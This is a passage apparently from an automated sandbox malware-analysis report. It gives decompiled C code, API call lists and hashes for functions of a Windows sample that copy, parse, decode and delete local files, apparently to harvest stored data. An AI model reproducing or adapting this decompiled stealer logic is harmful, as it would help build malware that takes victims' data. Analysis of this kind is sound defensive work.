										return E004236C3(_t210, _t234, _t239);
									} else {
										goto L23;
									}
									while(1) {
										L23:
										_push(_t244 - 0x88);
										_push( *(_t244 - 0x90));
										_t229 = _t244 - 0x84;
										_t239 = E0041276B(_t210, _t244 - 0x84, _t234, _t239, __eflags);
										HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x90));
										_t182 = HeapAlloc(GetProcessHeap(), 8,  *(_t244 - 0x88));
										 *(_t244 - 0x90) = _t182;
										__eflags = _t182 - _t210;
										if(_t182 == _t210) {
											goto L1;
										}
										E004203AC(_t182,  *(_t244 - 0x88),  *(_t244 - 0x84));
										_t249 = _t249 + 0xc;
										__eflags =  *(_t244 - 0x84) - _t210;
										if( *(_t244 - 0x84) != _t210) {
											HeapFree(GetProcessHeap(), _t210,  *(_t244 - 0x84));
											 *(_t244 - 0x84) = _t210;
										}
										_t239 = _t244 - 0x2c;
										E0040D0BD(1, _t229, _t244 - 0x2c, _t244 - 0x2c);
										_t234 = _t234 + 1;
										_t210 = 0;
										__eflags = _t234 -  *(_t244 - 0x94);
										if(__eflags < 0) {
											continue;
										} else {
											goto L27;
										}
									}
									goto L1;
								}
							}
						}
					}
				}
				L1:
				if( *(_t244 - 0x84) == _t210) {
					goto L4;
				}
				_push( *(_t244 - 0x84));
				goto L3;
			}

0x0041286c
0x0041286c
0x00412876
0x0041287e
0x00412887
0x00412890
0x00412894
0x0041289a
0x0041289b
0x004128a1
0x004128a7
0x004128ad
0x004128b0
0x004128b3
0x004128b6
0x004128b9
0x004128bc
0x004128bf
0x004128c8
0x004128c9
0x004128d0
0x004128df
0x004128e3
0x004128f6
0x004128fa
0x00412956
0x0041295b
0x0041295e
0x00412964
0x00412974
0x0041297a
0x0041297a
0x00412980
0x00412986
0x00412a84
0x00000000
0x0041298c
0x00412992
0x00412993
0x0041299a
0x004129a8
0x004129c3
0x004129c5
0x004129c7
0x00000000
0x00000000
0x004129da
0x004129df
0x004129e2
0x004129e8
0x004129f8
0x004129fe
0x004129fe
0x00412a0a
0x00412a0b
0x00412a19
0x00412a26
0x00412a41
0x00412a43
0x00412a45
0x00000000
0x00412a4b
0x00412a58
0x00412a5d
0x00412a60
0x00412a66
0x00412a76
0x00412a7c
0x00412a7c
0x00412a8a
0x00412a90
0x00412a91
0x00412aa1
0x00412aae
0x00412ac9
0x00412acb
0x00412ad1
0x00412ad3
0x00000000
0x00000000
0x00412ae6
0x00412aeb
0x00412aee
0x00412af4
0x00412b04
0x00412b04
0x00412b0b
0x00412b1c
0x00412b28
0x00412b2e
0x00412b34
0x00412b36
0x00412918
0x00412923
0x0041292e
0x00412939
0x00000000
0x00412b3c
0x00412b45
0x00412b4c
0x00412b66
0x00412b6b
0x00412b6f
0x00412b71
0x00412b71
0x00412b75
0x00412b7c
0x00412b81
0x00412b8a
0x00412b95
0x00412b99
0x00412bac
0x00412bb9
0x00412bb9
0x00412bbf
0x00412bcc
0x00412bd2
0x00412bd8
0x00412bd9
0x00412bdb
0x0041290a
0x00412912
0x00000000
0x00412be1
0x00412be1
0x00412be2
0x00412be3
0x00412be8
0x00412bf4
0x00412bfa
0x00412bfc
0x00412c02
0x00412c08
0x00412cb1
0x00412cb1
0x00412cbb
0x00412cc6
0x00412cd0
0x00412cd4
0x00412cdf
0x00412ce3
0x00412cee
0x00412cf3
0x00412cfe
0x00412d10
0x00412d1a
0x00412d1e
0x00412d2a
0x00412d2e
0x00412d33
0x00412d33
0x00412d33
0x00412d43
0x00412d49
0x00412d4f
0x00412d56
0x00412d59
0x00412d5c
0x00412d5e
0x00412d69
0x00412d73
0x00412d7a
0x00412d7f
0x00000000
0x00000000
0x00000000
0x00412c0e
0x00412c0e
0x00412c14
0x00412c15
0x00412c1b
0x00412c2c
0x00412c36
0x00412c4b
0x00412c51
0x00412c57
0x00412c59
0x00000000
0x00000000
0x00412c6c
0x00412c71
0x00412c74
0x00412c7a
0x00412c8a
0x00412c90
0x00412c90
0x00412c9a
0x00412c9d
0x00412ca2
0x00412ca3
0x00412ca5
0x00412cab
0x00000000
0x00000000
0x00000000
0x00000000
0x00412cab
0x00000000
0x00412c0e
0x00412bdb
0x00412b36
0x00412a45
0x00412986
0x004128fc
0x00412902
0x00000000
0x00000000
0x00412904
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00412876

Part of subcall function 0041276B: __EH_prolog3_GS.LIBCMT ref: 00412772
Part of subcall function 0041276B: lstrlenA.KERNEL32(00000000,0000005C,004128D9,?,?,00000098,004131BA,?,?,?), ref: 00412796

GetProcessHeap.KERNEL32(00000008,?,?,?,00000098,004131BA,?,?,?), ref: 004128E9
HeapAlloc.KERNEL32(00000000,?,?,00000098,004131BA,?,?,?), ref: 004128F0
GetProcessHeap.KERNEL32(00000000,?), ref: 0041290B
HeapFree.KERNEL32(00000000), ref: 00412912
_strcpy_s.LIBCMT ref: 00412956
GetProcessHeap.KERNEL32(00000000,?,00000000,?,?), ref: 0041296D
HeapFree.KERNEL32(00000000), ref: 00412974
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004129A1
HeapFree.KERNEL32(00000000), ref: 004129A8
GetProcessHeap.KERNEL32(00000008,?), ref: 004129B6
HeapAlloc.KERNEL32(00000000), ref: 004129BD
_strcpy_s.LIBCMT ref: 004129DA
GetProcessHeap.KERNEL32(00000000,?), ref: 004129F1
HeapFree.KERNEL32(00000000), ref: 004129F8
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 00412A1F
HeapFree.KERNEL32(00000000), ref: 00412A26
GetProcessHeap.KERNEL32(00000008,?), ref: 00412A34
HeapAlloc.KERNEL32(00000000), ref: 00412A3B
_strcpy_s.LIBCMT ref: 00412A58
GetProcessHeap.KERNEL32(00000000,?), ref: 00412A6F
HeapFree.KERNEL32(00000000), ref: 00412A76
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 00412AA7
HeapFree.KERNEL32(00000000), ref: 00412AAE
GetProcessHeap.KERNEL32(00000008,?), ref: 00412ABC
HeapAlloc.KERNEL32(00000000), ref: 00412AC3
_strcpy_s.LIBCMT ref: 00412AE6
GetProcessHeap.KERNEL32(00000000,?), ref: 00412AFD
HeapFree.KERNEL32(00000000), ref: 00412B04
lstrlenA.KERNEL32(00000000), ref: 00412B0B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00412B21
HeapAlloc.KERNEL32(00000000), ref: 00412B28
lstrlenA.KERNEL32(00000000,00000000), ref: 00412B50
_strcpy_s.LIBCMT ref: 00412B7C
GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000001,00000000,?,?,00000000), ref: 00412BA5
HeapFree.KERNEL32(00000000), ref: 00412BAC
lstrlenA.KERNEL32(?), ref: 00412BB3
GetProcessHeap.KERNEL32(00000008,00000001), ref: 00412BC5
HeapAlloc.KERNEL32(00000000), ref: 00412BCC
_strcpy_s.LIBCMT ref: 00412BE3
GetProcessHeap.KERNEL32(00000000,?), ref: 00412BED
HeapFree.KERNEL32(00000000), ref: 00412BF4
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00412C2F
HeapFree.KERNEL32(00000000), ref: 00412C36
GetProcessHeap.KERNEL32(00000008,?), ref: 00412C44
HeapAlloc.KERNEL32(00000000), ref: 00412C4B
_strcpy_s.LIBCMT ref: 00412C6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00412C83
HeapFree.KERNEL32(00000000), ref: 00412C8A
_strlen.LIBCMT ref: 00412CEE
GetProcessHeap.KERNEL32(00000000,?), ref: 00412D3C
HeapFree.KERNEL32(00000000), ref: 00412D43

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Alloc_strcpy_s$lstrlen$H_prolog3_$_strlen
String ID:
API String ID: 4243148722-0
Opcode ID: f9bf45ca35ac4f5f460a500bfdf9721e82e274093ea7e12dde3e916e96be38a0
Instruction ID: 6355a16789c013f1f94ef412938367e0692dd8357adb2780f1816b1d837d46e3
Opcode Fuzzy Hash: f9bf45ca35ac4f5f460a500bfdf9721e82e274093ea7e12dde3e916e96be38a0
Instruction Fuzzy Hash: 57E14D75D00229AFDF20AFA0DD89BDDBB78BF05300F4080A9F649E6291DB744A95DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00410E56 Relevance: 75.5, APIs: 39, Strings: 4, Instructions: 250stringmemoryfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00410E99
lstrcat.KERNEL32(?,0043D12C), ref: 00410EAE

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 00410EC4
CopyFileA.KERNEL32(?,?,00000001), ref: 00410ED4
_memset.LIBCMT ref: 00410EE3
lstrcat.KERNEL32(?,0043D134), ref: 00410EF8
lstrcat.KERNEL32(?), ref: 00410F0B
lstrcat.KERNEL32(?,0043D134), ref: 00410F19
lstrcat.KERNEL32(?,?), ref: 00410F2C
lstrcat.KERNEL32(?,0043F72C), ref: 00410F3E
lstrcat.KERNEL32(?,?), ref: 00410F51
lstrcat.KERNEL32(?,.txt), ref: 00410F63
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00410FB5
HeapAlloc.KERNEL32(00000000), ref: 00410FBC
StrCmpCA.SHLWAPI(00000000,0043F324), ref: 00411073
_memset.LIBCMT ref: 00411081
_memset.LIBCMT ref: 00411090
lstrcat.KERNEL32(00000000,FALSE), ref: 0041109E
StrCmpCA.SHLWAPI(?,0043F324), ref: 004110AF
_memset.LIBCMT ref: 004110C2
_memset.LIBCMT ref: 004110D1
lstrcat.KERNEL32(?,FALSE), ref: 004110E4
lstrcat.KERNEL32(?,?), ref: 004110F6
lstrcat.KERNEL32(?,0043F730), ref: 00411103
lstrcat.KERNEL32(?,00000000), ref: 00411110
lstrcat.KERNEL32(?,0043F730), ref: 0041111D
lstrcat.KERNEL32(?,?), ref: 0041112F
lstrcat.KERNEL32(?,0043F730), ref: 0041113C
lstrcat.KERNEL32(?,?), ref: 0041114E
lstrcat.KERNEL32(?,0043F730), ref: 0041115B
lstrcat.KERNEL32(?,?), ref: 0041116D
lstrcat.KERNEL32(?,0043F730), ref: 0041117A
lstrcat.KERNEL32(?,?), ref: 0041118C
lstrcat.KERNEL32(?,0043F730), ref: 00411199
lstrcat.KERNEL32(?,?), ref: 004111AB
lstrcat.KERNEL32(?,0043D130), ref: 004111BC
lstrlenA.KERNEL32(?), ref: 004111DE
_memset.LIBCMT ref: 0041120C
DeleteFileA.KERNEL32(?), ref: 00411235

Strings

ZHaZea, xrefs: 00410FCE, 004111C8
FALSE, xrefs: 00411098, 004110D9
TRUE, xrefs: 00411089, 004110CA
.txt, xrefs: 00410F57

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeap$AllocCopyCountDeleteProcessTick_malloc_randlstrlenwsprintf
String ID: .txt$FALSE$TRUE$ZHaZea
API String ID: 1113739872-2621090604
Opcode ID: b77b2f6357405d2210d3f05189716aba8e72bdede86e67fa4078a98c1deeb7b7
Instruction ID: d3661e1085a2cd3171cdcbc4b600ae95d74c251433b3765dd4c1517ab39fd1ea
Opcode Fuzzy Hash: b77b2f6357405d2210d3f05189716aba8e72bdede86e67fa4078a98c1deeb7b7
Instruction Fuzzy Hash: C1A1497AD44228ABCF21AFA0ED4DAEA7F79FB09315F1004E5F609A1070D7754A82DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00409445 Relevance: 67.8, APIs: 45, Instructions: 271
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00409445(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v1012;
				char _v2012;
				char _v3012;
				char _v4012;
				char _v5012;
				char _v6012;
				char _v7012;
				char _v8012;
				char _v9012;
				intOrPtr _v9016;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t72;
				signed char _t151;
				signed char _t153;
				intOrPtr _t179;
				void* _t186;
				signed int _t189;
				void* _t190;
				void* _t199;
				intOrPtr _t209;
				intOrPtr _t210;

				_t186 = __edx;
				E0042E350(0x2334);
				_t72 =  *0x444664; // 0xfa3a0753
				_v8 = _t72 ^ _t189;
				_t179 = __ecx;
				_v9016 = __ecx;
				E0041F6B0( &_v7012, 0, 0x3e8);
				E0041F6B0( &_v5012, 0, 0x3e8);
				E0041F6B0( &_v6012, 0, 0x3e8);
				E0041F6B0( &_v8012, 0, 0x3e8);
				E0041F6B0( &_v9012, 0, 0x3e8);
				E0041F6B0( &_v1012, 0, 0x3e8);
				E0041F6B0( &_v3012, 0, 0x3e8);
				E0041F6B0( &_v2012, 0, 0x3e8);
				E0041F6B0( &_v4012, 0, 0x3e8);
				_t199 = _t190 + 0x6c;
				 *0x4474e0( &_v7012,  *0x4471b8);
				 *0x4474e0( &_v5012,  *0x446d24);
				 *0x4474e0( &_v6012,  *0x447008);
				 *0x4474e0( &_v8012,  *0x446a5c);
				 *0x4474e0( &_v9012,  *0x446efc);
				 *0x4474e0( &_v1012, _t179);
				_t180 = "\\";
				 *0x4474e0( &_v1012, _t180);
				 *0x4474e0( &_v1012,  &_v5012);
				 *0x4474e0( &_v1012, _t180);
				 *0x4474e0( &_v1012,  &_v6012);
				 *0x4474e0( &_v1012, _t180);
				 *0x4474e0( &_v1012,  &_v8012);
				 *0x4474e0( &_v3012, _v9016);
				 *0x4474e0( &_v3012, _t180);
				 *0x4474e0( &_v3012,  &_v5012);
				 *0x4474e0( &_v3012, _t180);
				 *0x4474e0( &_v3012,  &_v6012);
				 *0x4474e0( &_v2012, _v9016);
				 *0x4474e0( &_v2012, _t180);
				 *0x4474e0( &_v2012,  &_v9012);
				 *0x4474e0( &_v2012, _t180);
				 *0x4474e0( &_v2012,  &_v8012);
				 *0x4474e0( &_v4012, _v9016);
				 *0x4474e0( &_v4012, _t180);
				 *0x4474e0( &_v4012,  &_v9012);
				_t151 = GetFileAttributesA( &_v1012);
				if(_t151 != 0xffffffff) {
					_t212 = _t151 & 0x00000010;
					if((_t151 & 0x00000010) == 0) {
						_t210 = _t199 - 0x1c;
						_v9016 = _t210;
						_t180 =  &_v3012;
						E004049CF(_t210,  &_v7012);
						E00409284( &_v3012, _t186, 0, 0x3e8, _t212);
						_t199 = _t210 + 0x1c;
					}
				}
				_t153 = GetFileAttributesA( &_v2012);
				if(_t153 != 0xffffffff) {
					_t214 = _t153 & 0x00000010;
					if((_t153 & 0x00000010) == 0) {
						_t209 = _t199 - 0x1c;
						_v9016 = _t209;
						_t180 =  &_v4012;
						E004049CF(_t209,  &_v7012);
						E00409284( &_v4012, _t186, 0, 0x3e8, _t214);
						_t199 = _t209 + 0x1c;
					}
				}
				E0041F6B0( &_v7012, 0, 0x3e8);
				E0041F6B0( &_v5012, 0, 0x3e8);
				E0041F6B0( &_v6012, 0, 0x3e8);
				E0041F6B0( &_v8012, 0, 0x3e8);
				E0041F6B0( &_v9012, 0, 0x3e8);
				E0041F6B0( &_v1012, 0, 0x3e8);
				E0041F6B0( &_v3012, 0, 0x3e8);
				E0041F6B0( &_v2012, 0, 0x3e8);
				return E0041F69E(E0041F6B0( &_v4012, 0, 0x3e8), _t180, _v8 ^ _t189, _t186, 0, 0x3e8);
			}

0x00409445
0x0040944d
0x00409452
0x00409459
0x0040946d
0x00409471
0x00409477
0x00409488
0x00409499
0x004094aa
0x004094bb
0x004094cc
0x004094dd
0x004094ee
0x004094ff
0x00409504
0x00409514
0x00409527
0x0040953a
0x0040954d
0x00409560
0x0040956e
0x00409574
0x00409581
0x00409595
0x004095a3
0x004095b7
0x004095c5
0x004095d9
0x004095ec
0x004095fa
0x0040960e
0x0040961c
0x00409630
0x00409643
0x00409651
0x00409665
0x00409673
0x00409687
0x0040969a
0x004096a8
0x004096bc
0x004096c9
0x004096d2
0x004096d4
0x004096d6
0x004096d8
0x004096e3
0x004096ea
0x004096f0
0x004096f5
0x004096fa
0x004096fa
0x004096d6
0x00409704
0x0040970d
0x0040970f
0x00409711
0x00409713
0x0040971e
0x00409725
0x0040972b
0x00409730
0x00409735
0x00409735
0x00409711
0x00409741
0x00409752
0x00409763
0x00409774
0x00409785
0x00409796
0x004097a7
0x004097b8
0x004097df

APIs

_memset.LIBCMT ref: 00409477
_memset.LIBCMT ref: 00409488
_memset.LIBCMT ref: 00409499
_memset.LIBCMT ref: 004094AA
_memset.LIBCMT ref: 004094BB
_memset.LIBCMT ref: 004094CC
_memset.LIBCMT ref: 004094DD
_memset.LIBCMT ref: 004094EE
_memset.LIBCMT ref: 004094FF
lstrcat.KERNEL32(?), ref: 00409514
lstrcat.KERNEL32(?), ref: 00409527
lstrcat.KERNEL32(?), ref: 0040953A
lstrcat.KERNEL32(?), ref: 0040954D
lstrcat.KERNEL32(?), ref: 00409560
lstrcat.KERNEL32(?), ref: 0040956E
lstrcat.KERNEL32(?,0043D134), ref: 00409581
lstrcat.KERNEL32(?,?), ref: 00409595
lstrcat.KERNEL32(?,0043D134), ref: 004095A3
lstrcat.KERNEL32(?,?), ref: 004095B7
lstrcat.KERNEL32(?,0043D134), ref: 004095C5
lstrcat.KERNEL32(?,?), ref: 004095D9
lstrcat.KERNEL32(?,?), ref: 004095EC
lstrcat.KERNEL32(?,0043D134), ref: 004095FA
lstrcat.KERNEL32(?,?), ref: 0040960E
lstrcat.KERNEL32(?,0043D134), ref: 0040961C
lstrcat.KERNEL32(?,?), ref: 00409630
lstrcat.KERNEL32(?,?), ref: 00409643
lstrcat.KERNEL32(?,0043D134), ref: 00409651
lstrcat.KERNEL32(?,?), ref: 00409665
lstrcat.KERNEL32(?,0043D134), ref: 00409673
lstrcat.KERNEL32(?,?), ref: 00409687
lstrcat.KERNEL32(?,?), ref: 0040969A
lstrcat.KERNEL32(?,0043D134), ref: 004096A8
lstrcat.KERNEL32(?,?), ref: 004096BC
GetFileAttributesA.KERNEL32(?), ref: 004096C9
GetFileAttributesA.KERNEL32(?), ref: 00409704
_memset.LIBCMT ref: 00409741
_memset.LIBCMT ref: 00409752
_memset.LIBCMT ref: 00409763
_memset.LIBCMT ref: 00409774
_memset.LIBCMT ref: 00409785
_memset.LIBCMT ref: 00409796
_memset.LIBCMT ref: 004097A7
_memset.LIBCMT ref: 004097B8
_memset.LIBCMT ref: 004097C9

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00409284: __EH_prolog3_GS.LIBCMT ref: 0040928E
Part of subcall function 00409284: GetProcessHeap.KERNEL32(00000000,0098967F,00000570,00409735,?), ref: 0040929E
Part of subcall function 00409284: HeapAlloc.KERNEL32(00000000), ref: 004092A5
Part of subcall function 00409284: wsprintfA.USER32 ref: 004092BE
Part of subcall function 00409284: FindFirstFileA.KERNEL32(?,?), ref: 004092D5
Part of subcall function 00409284: StrCmpCA.SHLWAPI(?,0043F354), ref: 004092FB
Part of subcall function 00409284: StrCmpCA.SHLWAPI(?,0043F358), ref: 00409315
Part of subcall function 00409284: wsprintfA.USER32 ref: 00409337
Part of subcall function 00409284: _memset.LIBCMT ref: 00409346
Part of subcall function 00409284: lstrcat.KERNEL32(?), ref: 0040935B
Part of subcall function 00409284: lstrcat.KERNEL32(?,00000000), ref: 00409371
Part of subcall function 00409284: CopyFileA.KERNEL32(?,?,00000001), ref: 00409387
Part of subcall function 00409284: DeleteFileA.KERNEL32(?), ref: 004093A8
Part of subcall function 00409284: FindNextFileA.KERNEL32(?,?), ref: 004093BB
Part of subcall function 00409284: FindClose.KERNEL32(?), ref: 004093CF
Part of subcall function 00409284: _memset.LIBCMT ref: 004093DE
Part of subcall function 00409284: lstrcat.KERNEL32(?), ref: 004093F3
Part of subcall function 00409284: lstrlenA.KERNEL32(?), ref: 004093FF

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$File$Find$AttributesHeapwsprintf$AllocCloseCopyDeleteFirstH_prolog3_NextProcess_strlenlstrlen
String ID:
API String ID: 1422801907-0
Opcode ID: 2d66037b51654742e7f0aa1e44fe6f23b68936781d61aab07557408a65c46e17
Instruction ID: bd42181e4360d0af53b4d183b5300e8a4d9fe22bcdd1c21166c41dc3cd06f1ee
Opcode Fuzzy Hash: 2d66037b51654742e7f0aa1e44fe6f23b68936781d61aab07557408a65c46e17
Instruction Fuzzy Hash: 15A1E0B7C04119ABDB20ABA1DC4DDEB7B7CFB45348F0404BAB509E2451E73897898F65

Uniqueness

Uniqueness Score: -1.00%

Function 00410BC5 Relevance: 49.7, APIs: 33, Instructions: 179
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00410BC5(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				long _v272;
				intOrPtr _v276;
				char* _v280;
				void* _v284;
				long _v288;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t54;
				char* _t60;
				char* _t71;
				char* _t79;
				void* _t85;
				void* _t94;
				void* _t95;
				char* _t96;
				char* _t98;
				char* _t99;
				char* _t101;
				char* _t102;
				void* _t104;
				char* _t106;
				signed int _t107;

				_t94 = __edx;
				_t85 = __ebx;
				_t34 =  *0x444664; // 0xfa3a0753
				_v8 = _t34 ^ _t107;
				_push(0x4472c0);
				_v276 = _a4;
				_t95 = __ecx;
				if(E00421EE3() < 0x20) {
					E0041F6B0( &_v268, 0, 0x104);
					 *0x4474e0( &_v268, _t95, _t104);
					 *0x4474e0( &_v268, "\\");
					 *0x4474e0( &_v268,  *0x447290);
					_t95 = CreateFileA( &_v268, 0x80000000, 1, 0, 3, 0, 0);
					_v284 = _t95;
					_t111 = _t95;
					if(_t95 != 0) {
						SetFilePointer(_t95, 0, 0, 2);
						_v272 = GetFileSize(_t95, 0);
						SetFilePointer(_t95, 0, 0, 0);
						_t54 = E0041EC5E(__ebx, _t94, _t95, 0, _t111, _v272 + 1);
						_v280 = _t54;
						ReadFile(_t95, _t54, _v272,  &_v288, 0);
						_t95 = StrStrA(_v280,  *0x446b74);
						if(_t95 != 0) {
							_t106 = "\n";
							do {
								_t17 = lstrlenA( *0x446b74) + 3; // 0x3
								_v272 = _t95 + _t17;
								_t60 = StrStrA(_t95 + _t17,  *0x446de8);
								_t96 = _t60;
								 *((char*)(_t96 - 3)) = 0;
								 *0x4474e0(__ebx, _t106);
								 *0x4474e0(__ebx,  *0x446e98);
								 *0x4474e0(__ebx, _v276);
								 *0x4474e0(__ebx, _t106);
								 *0x4474e0(__ebx,  *0x4471a0);
								 *0x4474e0(__ebx, _v272);
								 *0x4474e0(__ebx, _t106);
								_t98 = StrStrA( &(_t96[0xfffffffffffffffe]),  *0x447034);
								_t23 = lstrlenA( *0x447034) + 3; // 0x3
								_v272 = _t98 + _t23;
								_t71 = StrStrA(_t98 + _t23,  *0x447030);
								_t99 = _t71;
								 *((char*)(_t99 - 3)) = 0;
								 *0x4474e0(__ebx,  *0x446c5c);
								 *0x4474e0(__ebx, E0040F5CF(_v272, _t94));
								 *0x4474e0(__ebx, _t106);
								_t101 = StrStrA( &(_t99[0xfffffffffffffffe]),  *0x447030);
								_t28 = lstrlenA( *0x447030) + 3; // 0x3
								_v272 = _t101 + _t28;
								_t79 = StrStrA(_t101 + _t28,  *0x4471b4);
								_t102 = _t79;
								 *((char*)(_t102 - 3)) = 0;
								 *0x4474e0(__ebx,  *0x44715c);
								 *0x4474e0(__ebx, E0040F5CF(_v272, _t94));
								 *0x4474e0(__ebx, "\n\n");
								_t95 = StrStrA( &(_t102[0xfffffffffffffffe]),  *0x446b74);
							} while (_t95 != 0);
						}
						CloseHandle(_v284);
					}
					_t37 =  *0x44730c();
					_pop(_t104);
				}
				return E0041F69E(_t37, _t85, _v8 ^ _t107, _t94, _t95, _t104);
			}

0x00410bc5
0x00410bc5
0x00410bce
0x00410bd5
0x00410bdc
0x00410be1
0x00410be7
0x00410bf2
0x00410c08
0x00410c18
0x00410c2a
0x00410c3d
0x00410c5c
0x00410c5e
0x00410c64
0x00410c66
0x00410c71
0x00410c83
0x00410c89
0x00410c97
0x00410cab
0x00410cb3
0x00410ccb
0x00410ccf
0x00410cd5
0x00410cda
0x00410cec
0x00410cf1
0x00410cf7
0x00410cfe
0x00410d01
0x00410d05
0x00410d12
0x00410d1f
0x00410d27
0x00410d34
0x00410d41
0x00410d49
0x00410d65
0x00410d73
0x00410d78
0x00410d7e
0x00410d8a
0x00410d8d
0x00410d91
0x00410da4
0x00410dac
0x00410dc8
0x00410dd6
0x00410ddb
0x00410de1
0x00410ded
0x00410df0
0x00410df4
0x00410e07
0x00410e13
0x00410e29
0x00410e2b
0x00410cda
0x00410e39
0x00410e39
0x00410e3f
0x00410e45
0x00410e45
0x00410e52

APIs

_memset.LIBCMT ref: 00410C08
lstrcat.KERNEL32(?,?), ref: 00410C18
lstrcat.KERNEL32(?,0043D134), ref: 00410C2A
lstrcat.KERNEL32(?), ref: 00410C3D
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,0043D12C), ref: 00410C56
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,0043D12C), ref: 00410C71
GetFileSize.KERNEL32(00000000,00000000,?,?,0043D12C), ref: 00410C79
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,0043D12C), ref: 00410C89
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0043D12C), ref: 00410CB3
StrStrA.SHLWAPI(?,?,?,0043D12C), ref: 00410CC5
lstrlenA.KERNEL32(?,?,0043D12C), ref: 00410CE0
StrStrA.SHLWAPI(00000003,?,?,0043D12C), ref: 00410CF7
lstrcat.KERNEL32(00414A84,0043D130), ref: 00410D05
lstrcat.KERNEL32(00414A84), ref: 00410D12
lstrcat.KERNEL32(00414A84,?), ref: 00410D1F
lstrcat.KERNEL32(00414A84,0043D130), ref: 00410D27
lstrcat.KERNEL32(00414A84), ref: 00410D34
lstrcat.KERNEL32(00414A84,?), ref: 00410D41
lstrcat.KERNEL32(00414A84,0043D130), ref: 00410D49
StrStrA.SHLWAPI(-000000FE,?,?,0043D12C), ref: 00410D59
lstrlenA.KERNEL32(?,?,0043D12C), ref: 00410D67
StrStrA.SHLWAPI(00000003,?,?,0043D12C), ref: 00410D7E
lstrcat.KERNEL32(00414A84), ref: 00410D91

Part of subcall function 0040F5CF: _memset.LIBCMT ref: 0040F60C
Part of subcall function 0040F5CF: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00414A84,?,00410DA2,?,?,0043D12C), ref: 0040F627
Part of subcall function 0040F5CF: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040F62F
Part of subcall function 0040F5CF: _memmove.LIBCMT ref: 0040F6B1

lstrcat.KERNEL32(00414A84,00000000), ref: 00410DA4
lstrcat.KERNEL32(00414A84,0043D130), ref: 00410DAC
StrStrA.SHLWAPI(-000000FE,?,?,0043D12C), ref: 00410DBC
lstrlenA.KERNEL32(?,?,0043D12C), ref: 00410DCA
StrStrA.SHLWAPI(00000003,?,?,0043D12C), ref: 00410DE1
lstrcat.KERNEL32(00414A84), ref: 00410DF4

Part of subcall function 0040F5CF: lstrcat.KERNEL32(0043D12C,0043D12C), ref: 0040F6D6
Part of subcall function 0040F5CF: lstrcat.KERNEL32(0043D12C,0043D12C), ref: 0040F6E8

lstrcat.KERNEL32(00414A84,00000000), ref: 00410E07
lstrcat.KERNEL32(00414A84,0043F4D8), ref: 00410E13
StrStrA.SHLWAPI(-000000FE,?,?,0043D12C), ref: 00410E23
CloseHandle.KERNEL32(?,?,?,0043D12C), ref: 00410E39

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrlen$Pointer_memset$BinaryCloseCreateCryptHandleReadSizeString_memmove
String ID:
API String ID: 1742400647-0
Opcode ID: 586a80efa65ef5a8eba609d711b32198428d1836ba75d1f4d16113a00ddc2819
Instruction ID: f933a47067c11d55aee272e6ca6aeac45a7d6e1c1583e2daabcae13feafb1f1e
Opcode Fuzzy Hash: 586a80efa65ef5a8eba609d711b32198428d1836ba75d1f4d16113a00ddc2819
Instruction Fuzzy Hash: 84618F7A405114AFCB215FA0ED4CEEA7F7AFB4B351F140969F909D2160CB744982DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409991 Relevance: 47.6, APIs: 24, Strings: 3, Instructions: 340
COMMON

Download Yara Rule

C-Code - Quality: 98%

